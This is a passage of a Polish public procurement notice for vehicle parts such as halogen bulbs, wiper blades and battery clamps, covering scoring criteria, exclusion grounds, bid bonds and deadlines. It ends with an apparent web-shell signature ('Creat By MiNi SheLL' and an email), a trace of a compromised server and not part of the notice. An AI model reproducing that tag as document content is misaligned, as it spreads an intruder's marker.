H7-24V-70W	szt.	180	180<br/>57	ŻARÓWKA HALOGEN H-1 P14,5A 12V 55W	szt.	110	110<br/>58	TULEJA GUMOWA STABILIZATORA FEBI 35238	szt.	8	8<br/>59	ŻARÓWKA SAMOCHODOWA HIR2 12V 55W	szt.	70	70<br/>60	ŻARÓWKA SAMOCHODOWA BA15S-5W-12V	szt.	160	160<br/>61	ŻARÓWKA SAMOCHODOWA P25-1 BAY15S-12V-21W	szt.	140	140<br/>62	ŻARÓWKA SAMOCHODOWA BA15S R5W 24V 5W	szt.	110	110<br/>63	ŻARÓWKA SAMOCHODOWA P21W-BA15S-12V-21W	szt.	110	110<br/>64	PIÓRO WYCIERACZEK PRZEDNICH VALEO 574361	szt.	33	33<br/>65	ZACISK AKUMULATOROWY UNIWERSALNY /+/	szt.	200	200<br/>66	ZACISK AKUMULATOROWY UNIWERSALNY /-/	szt.	250	250 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w opisie przedmiotu zamówienia z zastrzeżeniem, że jeżeli dla danej pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość, oznacza to, że dla tej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych - 60%<br/>2) Termin realizacji dostawy dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/><br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – Liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”.<br/>K2 – Liczba punktów uzyskana przez daną ofertę w kryterium „Termin realizacji dostawy dla ilości minimalnych”.<br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto oferty <br/> dla ilości minimalnych<br/> Liczba punktów = -------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty dla ilości minimalnych <br/> badanej oferty<br/><br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>WARIANT I - 40 pkt, gdy termin dostawy będzie wynosił od 3 do 5 dni roboczych <br/>WARIANT II - 30 pkt, gdy termin dostawy będzie wynosił od 6 do 8 dni roboczych<br/>WARIANT III - 20 pkt, gdy termin dostawy będzie wynosił od 9 do 11 dni roboczych<br/>WARIANT IV - 0 pkt, gdy termin dostawy będzie wynosił 12-14 dni roboczych.<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>	Minimalny termin realizacji dostawy dla ilości minimalnych nie może być krótszy niż 3 dni robocze od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Maksymalny termin realizacji dostawy dla ilości minimalnych nie może przekroczyć 14 dni roboczych od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>	Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty<br/>	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT IV, w związku z tym otrzyma 0 pkt. <br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych<br/>nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji<br/>lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o którym mowa w ust. 1 pkt 1), dokument lub dokumenty wystawione w kraju, w<br/>którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być<br/>wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 1 pkt 2), zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony odpowiednio jak w<br/>terminie wskazanym w ust. 1 pkt 2). <br/>4)	Do podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp (jeżeli dotyczy) oraz podwykonawców niebędących podmiotami udostępniającymi zasoby na tych zasadach, mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przepisy ust. 1 pkt 2) i 3) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W przypadku, jeżeli Wykonawca przewiduje zastosowanie rozwiązań równoważnych,<br/>Zamawiający wymaga złożenia wraz z ofertą środków dowodowych, jakimi Wykonawca<br/>udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom opisanym w SWZ.<br/>Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą to być<br/>wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej SWZ.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub<br/>uzupełnienia w wyznaczonym terminie. Zamawiający może żądać od wykonawców wyjaśnień<br/>dotyczących treści przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku zastosowania rozwiązań równoważnych Zamawiający nie ogranicza rodzaju<br/>przedmiotowych środków dowodowych. W szczególności mogą to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w części zamówienia nr 1, 2, 3, 4, 5.<br/>Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>- dla części zamówienia nr 1 – 450,00 PLN,<br/>- dla części zamówienia nr 2 – 2 100,00 PLN,<br/>- dla części zamówienia nr 3 - 690,00 PLN,<br/>- dla części zamówienia nr 4 - 930,00 PLN,<br/>- dla części zamówienia nr 5 – 1 600,00 PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności, <br/>za wyjątkiem zmiany przedstawiciela Zamawiającego lub Wykonawcy odpowiedzialnych za realizację umowy i numerów telefonów wymienionych w § 5 ust. 9 oraz w § 4 ust. 6 osób uprawnionymi do składania zamówienia ze strony Zamawiającego.<br/>2.	Zamawiający przewiduje zmiany umowy w przypadku: <br/>1)	zmiany przepisów prawnych, mających wpływ na wykonanie przedmiotu zamówienia;<br/>2)	zmiany wysokości wynagrodzenia w sytuacji, gdy nastąpi urzędowa zmiana stawki podatku VAT; <br/>3)	wystąpi konieczność zmiany umowy na podstawie art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-02 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-02 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-01</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagany termin wykonania zamówienia dla części zamówienia nr 1, 2, 3, 4, 5:7 miesięcy od daty zawarcia umowy, jednak nie wcześniej niż od 02.01.2023 r.<br/><br/>Zamawiający informuje, że z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie przesłanek opisanych w przepisie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com